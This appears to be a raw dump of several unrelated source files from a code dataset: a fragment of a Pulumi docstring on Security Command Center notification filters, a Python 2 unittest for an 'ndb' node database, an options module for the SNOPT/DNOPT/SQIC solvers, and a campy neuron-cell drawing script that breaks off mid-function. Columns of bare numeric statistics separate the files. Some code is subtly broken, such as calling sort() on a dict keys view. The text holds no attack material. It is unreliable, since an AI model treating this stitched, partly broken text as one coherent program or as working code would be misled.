Restrictions have the form <field> <operator> <value> and may have
a - character in front of them to indicate negation. The fields
map to those defined in the corresponding resource.
The supported operators are:
* = for all value types.
* >, <, >=, <= for integer values.
* :, meaning substring matching, for strings.
The supported value types are:
* string literals in quotes.
* integer literals without quotes.
* boolean literals true and false without quotes.
See
[Filtering notifications](https://cloud.google.com/security-command-center/docs/how-to-api-filter-notifications)
for information on how to write a filter.
"""
pulumi.set(__self__, "filter", filter)
@property
@pulumi.getter
def filter(self) -> str:
"""
Expression that defines the filter to apply across create/update
events of assets or findings as specified by the event type. The
expression is a list of zero or more restrictions combined via
logical operators AND and OR. Parentheses are supported, and OR
has higher precedence than AND.
Restrictions have the form <field> <operator> <value> and may have
a - character in front of them to indicate negation. The fields
map to those defined in the corresponding resource.
The supported operators are:
* = for all value types.
* >, <, >=, <= for integer values.
* :, meaning substring matching, for strings.
The supported value types are:
* string literals in quotes.
* integer literals without quotes.
* boolean literals true and false without quotes.
See
[Filtering notifications](https://cloud.google.com/security-command-center/docs/how-to-api-filter-notifications)
for information on how to write a filter.
"""
return pulumi.get(self, "filter")
| 43.333333
| 127
| 0.638127
| 356
| 2,990
| 5.308989
| 0.38764
| 0.010582
| 0.022222
| 0.025397
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0
| 0.000473
| 0.293645
| 2,990
| 68
| 128
| 43.970588
| 0.894413
| 0.717391
| 0
| 0
| 1
| 0
| 0.088933
| 0.065217
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
365f8018a866d29a63bdb661b7fcacc0719a6958
| 6,985
|
py
|
Python
|
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | 1
|
2015-07-05T16:32:26.000Z
|
2015-07-05T16:32:26.000Z
|
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | null | null | null |
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import os
import unittest
import ndb
class StatementTest(unittest.TestCase):
'''
node database statement unit test
'''
def setUp(self):
self.node = ndb.read('example.ndb')
def test_exits(self):
'''exits test'''
result = ndb.execute(self.node, 'exist:root->parent->child->name:jim')
self.assertEqual(result, True)
result = ndb.execute(self.node, 'exist:root->parent->child->sex:male && name:m$')
self.assertEqual(result, True)
result = ndb.execute(self.node, 'exist:root->parent->child->sex:female && name:m$')
self.assertEqual(result, False)
def test_one(self):
'''one test'''
result = ndb.execute(self.node, 'one:root->parent->child->sex:male')
self.assertEqual(result.get('name'), 'jim')
self.assertEqual(result.get('age'), '20')
def test_select(self):
'''select test'''
result = ndb.execute(self.node, 'select:root->parent->child->name:/.*m/')
self.assertEquals(len(result), 2)
self.assertEquals(result[0].get('name'), 'jim')
self.assertEquals(result[1].get('name'), 'tom')
result = ndb.execute(self.node, 'select:root->parent->child->age:[15,25]')
self.assertEquals(len(result), 2)
self.assertEquals(result[0].get('name'), 'jim')
self.assertEquals(result[1].get('name'), 'lily')
result = ndb.execute(self.node, 'select:root->parent->child->sex:^fe')
self.assertEquals(len(result), 1)
self.assertEquals(result[0].get('name'), 'lily')
result = ndb.execute(self.node, 'select:root->parent->child->name:m$')
self.assertEquals(len(result), 2)
self.assertEquals(result[0].get('name'), 'jim')
self.assertEquals(result[1].get('name'), 'tom')
result = ndb.execute(self.node, 'select:root->parent->child->sex:male && age:[15,25]')
self.assertEquals(len(result), 1)
self.assertEquals(result[0].get('name'), 'jim')
result = ndb.execute(self.node, 'select:root->parent->child')
self.assertEquals(len(result), 3)
self.assertEquals(result[0].get('name'), 'jim')
self.assertEquals(result[1].get('name'), 'lily')
self.assertEquals(result[2].get('name'), 'tom')
result = ndb.execute(self.node, 'select:root->parent->:/child|nephew/->sex:female')
self.assertEquals(len(result), 2)
self.assertEquals(result[0].get('name'), 'lucy')
self.assertEquals(result[1].get('name'), 'lily')
def test_update(self):
''''update test'''
result = ndb.execute(self.node, 'update:root->parent->child->name:jim !! age=21, address=China')
result = ndb.execute(result, 'select:root->parent->child->name:jim')
self.assertEquals(len(result), 1)
self.assertEquals(result[0].get('age'), '21')
self.assertEquals(result[0].get('address'), 'China')
def test_delete(self):
'''delete test'''
result = ndb.execute(self.node, 'delete:root->parent->child->name:jim !! [sex, age]')
result = ndb.execute( result, 'select:root->parent->child->name:jim')
self.assertEquals(len(result), 1)
self.assertEquals(result[0].get('name'), 'jim')
self.assertEquals(result[0].get('sex'), None)
self.assertEquals(result[0].get('age'), None)
result = ndb.execute(self.node, 'delete:root->parent->child->name:jim !! block')
result = ndb.execute(result, 'select:root->parent->child->name:jim')
self.assertEquals(len(result), 0);
def test_insert(self):
'''insert test'''
result = ndb.execute(self.node, 'insert:root->parent->child !! name=bill, sex=male, age=31')
select_result = ndb.execute(result, 'select:root->parent->child->name:bill')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('sex'), 'male')
self.assertEquals(select_result[0].get('age'), '31')
def test_redirect(self):
'''redirect test'''
ndb.execute(self.node, 'select:root->parent->:/child|nephew/->sex:female >> select.ndb')
node = ndb.read('select.ndb')
select_result = ndb.execute(node, 'select:result->sex:female')
self.assertEquals(len(select_result), 2)
self.assertEquals(select_result[0].get('name'), 'lucy')
self.assertEquals(select_result[1].get('name'), 'lily')
ndb.execute(self.node, 'insert:root->parent->child !! name=bill, sex=male, age=31 >> insert.ndb')
node = ndb.read('insert.ndb')
select_result = ndb.execute(node, 'select:root->parent->child->name:bill')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('name'), 'bill')
self.assertEquals(select_result[0].get('sex'), "male")
self.assertEquals(select_result[0].get('age'), "31")
ndb.execute(self.node, 'update:root->parent->child->name:jim !! age=21, address=China >> update.ndb')
node = ndb.read('update.ndb')
select_result = ndb.execute(node, 'select:root->parent->child->name:jim')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('name'), 'jim')
self.assertEquals(select_result[0].get('address'), "China")
self.assertEquals(select_result[0].get('age'), "21")
# delete temp file
files = ['select.ndb', 'insert.ndb', 'update.ndb']
for filename in files:
os.remove(filename)
def test_script(self):
'''script test'''
result = ndb.execute(self.node, "script:example.script")
select_result = ndb.execute(result, 'select:root->parent->child->name:bill')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('name'), 'bill')
self.assertEquals(select_result[0].get('sex'), "male")
self.assertEquals(select_result[0].get('age'), "31")
select_result = ndb.execute(result, 'select:root->parent->child->name:lily')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('name'), 'lily')
self.assertEquals(select_result[0].get('address'), 'China')
self.assertEquals(select_result[0].get('age'), '21')
select_result = ndb.execute(result, 'select:root->parent->child->name:jim')
self.assertEquals(len(select_result), 1)
self.assertEquals(select_result[0].get('name'), 'jim')
self.assertEquals(select_result[0].get('sex'), None)
self.assertEquals(select_result[0].get('age'), None)
def test_print_node(self):
'''node print test'''
result = ndb.print_node(None, self.node)
print result
if __name__ == '__main__':
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 43.930818
| 109
| 0.607731
| 870
| 6,985
| 4.81954
| 0.090805
| 0.206058
| 0.071548
| 0.081565
| 0.824469
| 0.773193
| 0.746721
| 0.69616
| 0.69616
| 0.674934
| 0
| 0.015371
| 0.208304
| 6,985
| 158
| 110
| 44.208861
| 0.742857
| 0.010451
| 0
| 0.353982
| 0
| 0.017699
| 0.235119
| 0.151425
| 0
| 0
| 0
| 0
| 0.522124
| 0
| null | null | 0
| 0.026549
| null | null | 0.026549
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3673881a0780666794f68e26d130d3eae92b5035
| 15,914
|
py
|
Python
|
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
from abc import ABC
from optimize.solvers import snopt7_python as fsnopt
from optimize.solvers import dnopt_python as fdnopt
#-------------------------------------------------------------------------------#
def copyOpts(verbose,usropts,work):
# Copy options to workspace
info = 0
keywords = sorted(usropts.options.keys())
for key in keywords:
if key not in ['Verbose',
'Start type',
'Specs filename',
'Print filename',
'Summary',
'Max memory attempts']:
if usropts.options[key][0] is not None:
if usropts.options[key][0] is bool:
optstr = key + ' ' + 'yes' if usropts.options[key][0] is True else 'no'
else:
optstr = key + ' ' + str(usropts.options[key][0])
if verbose:
print(' Setting option: ' + optstr)
if type(usropts) is SNOPT_options:
info = fsnopt.copyoptions(optstr,work.cw,work.iw,work.rw)
elif type(usropts) is DNOPT_options:
info = fdnopt.copyoptions(optstr,work.cw,work.iw,work.rw)
return info
#-------------------------------------------------------------------------------#
class OptionsClass(ABC):
'''
Options Class
'''
def __init__ (self):
self.setup()
self.solverName = 'None'
def setup(self):
self.options = None
def __str__(self):
text = '\n' + self.solverName + ' options \n'
keywords = self.options.keys()
keywords.sort()
for key in keywords:
value = self.options[key][0]
if value is None:
text += ' ' + str(key) + ': undefined\n'
else:
text += ' ' + str(key) + ': ' + str(self.options[key][0]) + '\n'
text += '\n' + self.solverName + \
' will set any parameters that are undefined to defaults.\n' + \
'Please refer to ' + self.solverName + ' documentation for details.\n'
return text
def printOptions(self):
print(self.__repr__())
def setOption(self,name,value):
try:
if type(value) is self.options[name][2]:
self.options[name][0] = value
except:
raise RuntimeError('Incorrect option keyword or type: ' + name)
def getOption(self,name):
try:
value = self.options[name][0]
return value
except:
raise RuntimeError('Incorrect option keyword: ' + name)
def resetOption(self,name):
try:
self.options[name] = self.options[name][1]
except:
raise RuntimeError('Incorrect option keyword: ' + name)
#-------------------------------------------------------------------------------#
class SQIC_options(OptionsClass):
'''
SQIC_options class:
'''
def __init__ (self):
self.setup()
self.solverName = 'SQIC'
def setup(self):
self.options = {
# [Current value, default value, type]
'Start type' : ['Cold','Cold',str],
'Specs filename' : [None,None,str],
'Print filename' : ['SQIC.out','SQIC.out',str],
'Print frequency' : [None,None,int],
'Print level' : [None,None,int], # minor print level
'Summary' : ['yes','yes',str],
'Summary frequency' : [None,None,int],
'Solution file' : [None,None,int],
'Solution print' : [None,None,bool],
'Minor print level' : [None,None,int],
'Sticky parameters' : [None,None,int],
'Suppress' : [None,None,int],
'Time limit' : [None,None,float],
'Timing level' : [None,None,int],
'System information' : [None,None,int],
'Verify level' : [None,None,int],
#'Problem minmax' : ['Minimize','Minimize',str],
'Proximal point' : [None,None,int],
#'QP solver' : [None,None,str], # Cholesky/CG/QN
'Minor phase1' : [None,None,float], #tolOptFP
'Feasibility tolerance' : [None,None,float], #tolx
'Optimality tolerance' : [None,None,float], #tolOptQP
'Iteration limit' : [None,None,int], #itnlim
'CG tolerance' : [None,None,float],
'CG preconditioning' : [None,None,int],
'CG iterations' : [None,None,int],
'Crash option' : [None,None,int],
'Crash tolerance' : [None,None,float],
'Debug level' : [None,None,int],
'Derivative level' : [None,None,int],
'Derivative linesearch' : [None,None,int],
'Derivative option' : [None,None,int],
'Elastic objective' : [None,None,int],
'Elastic mode' : [None,None,int],
'Elastic weight' : [None,None,float],
'Elastic weightmax' : [None,None,float],
'Hessian frequency' : [None,None,int],
'Hessian flush' : [None,None,int],
'Hessian type' : [None,None,int],
'Hessian updates' : [None,None,int],
'Infinite bound' : [1.0e+20,1.0e+20,float],
'Major step limit' : [None,None,float],
'Unbounded objective' : [None,None,float],
'Unbounded step' : [None,None,float],
#'LU type' : [None,None,str], #partial/complete/rook
'LU swap' : [None,None,float],
'LU factor tolerance' : [None,None,float],
'LU update tolerance' : [None,None,float],
'LU density' : [None,None,float],
'LU singularity' : [None,None,float],
'New superbasics' : [None,None,int],
'Partial pricing' : [None,None,int],
'Penalty parameter' : [None,None,float],
'Pivot tolerance' : [None,None,float],
'Reduced Hessian limit' : [None,None,int],
'Superbasics limit' : [None,None,int],
'Scale option' : [None,None,int],
'Scale tolerance' : [None,None,float],
'Scale print' : [None,None,int],
'Verbose' : [False,False,bool] # python verbose
}
#-------------------------------------------------------------------------------#
class SNOPT_options(OptionsClass):
'''
SNOPT_options class:
'''
def __init__ (self):
self.setup()
self.solverName = 'SNOPT'
def setup(self):
self.options = {
# [Current value, default value, type]
'Start type' : ['Cold','Cold',str], ##
'Specs filename' : [None,None,str], ##
'Print filename' : ['SNOPT.out','SNOPT.out',str], ##
'Print frequency' : [None,None,int],
'Print level' : [None,None,int], # minor print level
'Summary' : ['yes','yes',str],
'Summary frequency' : [None,None,int],
'Solution file' : [None,None,int],
'Solution print' : [None,None,bool],
'Major print level' : [None,None,int],
'Minor print level' : [None,None,int],
'Sticky parameters' : [None,None,int],
'Suppress' : [None,None,int],
'Time limit' : [None,None,float],
'Timing level' : [None,None,int],
'System information' : [None,None,int],
'Verify level' : [None,None,int],
'Max memory attempts' : [10,10,int],
'Total character workspace' : [None,None,int],
'Total integer workspace' : [None,None,int],
'Total real workspace' : [None,None,int],
#'Problem minmax' : ['Minimize','Minimize',str],
'Proximal point' : [None,None,int],
#'QP solver' : [None,None,str], # Cholesky/CG/QN
'Major feasibility' : [None,None,float], #tolCon
'Major optimality' : [None,None,float], #tolOptNP
'Minor feasibility' : [None,None,float], #tolx
'Minor optimality' : [None,None,float], #tolOptQP
'Minor phase1' : [None,None,float], #tolOptFP
'Feasibility tolerance' : [None,None,float], #tolx
'Optimality tolerance' : [None,None,float], #tolOptQP
'Iteration limit' : [None,None,int], #itnlim
'Major iterations' : [None,None,int], #mMajor
'Minor iterations' : [None,None,int], #mMinor
'CG tolerance' : [None,None,float],
'CG preconditioning' : [None,None,int],
'CG iterations' : [None,None,int],
'Crash option' : [None,None,int],
'Crash tolerance' : [None,None,float],
'Debug level' : [None,None,int],
'Derivative level' : [None,None,int],
'Derivative linesearch' : [None,None,int],
'Derivative option' : [None,None,int],
'Elastic objective' : [None,None,int],
'Elastic mode' : [None,None,int],
'Elastic weight' : [None,None,float],
'Elastic weightmax' : [None,None,float],
'Hessian frequency' : [None,None,int],
'Hessian flush' : [None,None,int],
'Hessian type' : [None,None,int],
'Hessian updates' : [None,None,int],
'Infinite bound' : [1.0e+20,1.0e+20,float],
'Major step limit' : [None,None,float],
'Unbounded objective' : [None,None,float],
'Unbounded step' : [None,None,float],
'Linesearch tolerance' : [None,None,float],
'Linesearch debug' : [None,None,int],
#'LU type' : [None,None,str], #partial/complete/rook
'LU swap' : [None,None,float],
'LU factor tolerance' : [None,None,float],
'LU update tolerance' : [None,None,float],
'LU density' : [None,None,float],
'LU singularity' : [None,None,float],
'New superbasics' : [None,None,int],
'Partial pricing' : [None,None,int],
'Penalty parameter' : [None,None,float],
'Pivot tolerance' : [None,None,float],
'Reduced Hessian limit' : [None,None,int],
'Superbasics limit' : [None,None,int],
'Scale option' : [None,None,int],
'Scale tolerance' : [None,None,float],
'Scale print' : [None,None,int],
'Verbose' : [False,False,bool] ##
}
#-------------------------------------------------------------------------------#
class DNOPT_options(OptionsClass):
'''
DNOPT_options class:
'''
def __init__ (self):
self.setup()
self.solverName = 'DNOPT'
def setup(self):
self.options = {
# [Current value, default value, type]
'Start type' : ['Cold','Cold',str], ##
'Specs filename' : [None,None,str], ##
'Print filename' : ['SNOPT.out','SNOPT.out',str], ##
'Print frequency' : [None,None,int],
'Print level' : [None,None,int], # minor print level
'Summary' : ['yes','yes',str],
'Summary frequency' : [None,None,int],
'Solution file' : [None,None,int],
'Solution print' : [None,None,bool],
'Major print level' : [None,None,int],
'Minor print level' : [None,None,int],
'Sticky parameters' : [None,None,int],
'Suppress' : [None,None,int],
'Time limit' : [None,None,float],
'Timing level' : [None,None,int],
'System information' : [None,None,int],
'Verify level' : [None,None,int],
'Max memory attempts' : [10,10,int],
'Total character workspace' : [None,None,int],
'Total integer workspace' : [None,None,int],
'Total real workspace' : [None,None,int],
#'Problem minmax' : ['Minimize','Minimize',str],
'Proximal point' : [None,None,int],
#'QP solver' : [None,None,str], # Cholesky/CG/QN
'Major feasibility' : [None,None,float], #tolCon
'Major optimality' : [None,None,float], #tolOptNP
'Minor feasibility' : [None,None,float], #tolx
'Minor optimality' : [None,None,float], #tolOptQP
'Minor phase1' : [None,None,float], #tolOptFP
'Feasibility tolerance' : [None,None,float], #tolx
'Optimality tolerance' : [None,None,float], #tolOptQP
'Iteration limit' : [None,None,int], #itnlim
'Major iterations' : [None,None,int], #mMajor
'Minor iterations' : [None,None,int], #mMinor
'CG tolerance' : [None,None,float],
'CG preconditioning' : [None,None,int],
'CG iterations' : [None,None,int],
'Crash option' : [None,None,int],
'Crash tolerance' : [None,None,float],
'Debug level' : [None,None,int],
'Derivative level' : [None,None,int],
'Derivative linesearch' : [None,None,int],
'Derivative option' : [None,None,int],
'Elastic objective' : [None,None,int],
'Elastic mode' : [None,None,int],
'Elastic weight' : [None,None,float],
'Elastic weightmax' : [None,None,float],
'Hessian frequency' : [None,None,int],
'Hessian flush' : [None,None,int],
'Hessian type' : [None,None,int],
'Hessian updates' : [None,None,int],
'Infinite bound' : [1.0e+20,1.0e+20,float],
'Major step limit' : [None,None,float],
'Unbounded objective' : [None,None,float],
'Unbounded step' : [None,None,float],
'Linesearch tolerance' : [None,None,float],
'Linesearch debug' : [None,None,int],
#'LU type' : [None,None,str], #partial/complete/rook
'LU swap' : [None,None,float],
'LU factor tolerance' : [None,None,float],
'LU update tolerance' : [None,None,float],
'LU density' : [None,None,float],
'LU singularity' : [None,None,float],
'Partial pricing' : [None,None,int],
'Penalty parameter' : [None,None,float],
'Pivot tolerance' : [None,None,float],
'Reduced Hessian limit' : [None,None,int],
'Scale option' : [None,None,int],
'Scale tolerance' : [None,None,float],
'Scale print' : [None,None,int],
'Verbose' : [False,False,bool] ##
}
| 40.085642
| 91
| 0.460664
| 1,471
| 15,914
| 4.960571
| 0.123046
| 0.201727
| 0.158284
| 0.078388
| 0.841168
| 0.838016
| 0.828971
| 0.808003
| 0.79841
| 0.773194
| 0
| 0.00475
| 0.378283
| 15,914
| 396
| 92
| 40.186869
| 0.732767
| 0.086339
| 0
| 0.789286
| 0
| 0
| 0.231485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.010714
| 0
| 0.085714
| 0.05
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36773213d1540fdf62f0b5d098963941c8d666bd
| 45,301
|
py
|
Python
|
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
"""
File: My drawing - The neuron cell cycle of brain neural development
Name:Claire Lin
----------------------
TODO: The cell cycle of brain neural development. It's also like a programming.
"""
from campy.graphics.gobjects import GOval, GRect, GArc, GLine, GLabel
from campy.graphics.gwindow import GWindow
window = GWindow(width=1200, height=500, title='Brain neural development')
def main():
"""
TODO: The cell cycle of brain neural development. It's also like a programming.
"""
lines()
g1_s_cell()
s_cell()
g2_cell()
m_cell()
g1_cell()
g1_s2_cell()
neurons()
word()
arrow()
def g1_s_cell():
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=100, y=280)
line = GLine(140, 200, 140, 200)
line.color = 'gray'
window.add(line)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 110, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 100, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 96, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 110, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 125, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 121, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 123, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 116, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 127, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 120, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 109, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 112, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, x=105, y=290)
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=150, y=280)
line = GLine(190, 200, 190, 200)
line.color = 'gray'
window.add(line)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 160, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 150, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 146, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 160, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 175, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 171, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 173, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 166, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 177, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 170, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 159, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 162, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, x=155, y=290)
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'skyblue'
neuron.fill_color = 'skyblue'
window.add(neuron, x=120, y=280)
line = GLine(160, 200, 160, 200)
line.color = 'gray'
window.add(line)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 130, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 120, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 116, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 130, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 145, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 141, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 143, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 136, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 147, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 140, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 129, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 132, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, x=125, y=290)
def s_cell():
neuron = GOval(width=40, height=70)
neuron.filled = True
neuron.color = 'skyblue'
neuron.fill_color = 'skyblue'
window.add(neuron, x=238, y=227)
neuron = GOval(width=40, height=50)
neuron.filled = True
neuron.color = 'skyblue'
neuron.fill_color = 'skyblue'
window.add(neuron, x=231, y=240)
arc = GArc(55, 65, 60, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 221, 230)
arc = GArc(80, 100, 210, 85) # neuron head
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 235, 192)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 260, 70)
fiber = GArc(5, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 263, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 255, 25)
head = GArc(25, 70, 30, 70) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 262, 22)
fiber = GArc(9, 140, 80, 180) # second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 242, 290)
arc = GArc(30, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 231, 386)
arc = GArc(35, 80, 22, 113) # cell bottom
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 231, 283)
arc = GArc(57, 45, 60, 170) # cell bottom
arc.filled = True
arc.color = 'orange'
arc.fill_color = 'orange'
window.add(arc, 233, 233)
arc = GArc(50, 50, 250, 150) # cell bottom
arc.filled = True
arc.color = 'orange'
arc.fill_color = 'orange'
window.add(arc, 232, 228)
def g2_cell():
cell = GArc(80, 80, 80, 180) # left cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 340, 300)
cell = GArc(80, 80, 265, 180) # right cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 338, 298)
bottom = GArc(50, 50, 50, 80)
bottom.filled = True
bottom.color = 'skyblue'
bottom.fill_color = 'skyblue'
window.add(bottom, 344, 370)
head = GArc(50, 60, 230, 70)
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 350, 277)
fiber = GArc(10, 240, 95, 180) # first fiber
fiber.filled = True
